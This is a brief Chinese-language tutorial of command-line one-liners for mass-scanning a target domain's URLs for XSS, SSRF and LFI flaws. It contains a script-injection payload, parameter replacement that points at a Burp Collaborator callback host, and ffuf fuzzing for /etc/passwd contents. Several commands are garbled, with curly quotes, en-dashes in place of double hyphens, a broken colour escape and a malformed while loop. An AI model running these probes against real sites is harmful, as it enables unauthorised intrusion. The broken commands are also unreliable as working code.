背景介绍

本文将告诉你如何使用 gf、httpx、waybackurls、qsreplace、gau 工具快速找到 SSRF、XSS 和 LFI 漏洞。废话不多说，开始！

XSS

首先将使用 gf、httpx、waybackurls、qsreplace这些工具来寻找XSS漏洞，命令如下：

cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done

以上命令可以在指定目标域中发现XSS漏洞。

SSRF

命令：

findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep “=” | qsreplace http://YOUR.burpcollaborator.net

上述命令将过滤 SSRF 的参数，并将请求发送给到burpcollaborator。

LFI

命令：

findomain -t example.com -q | waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done

你学废了么？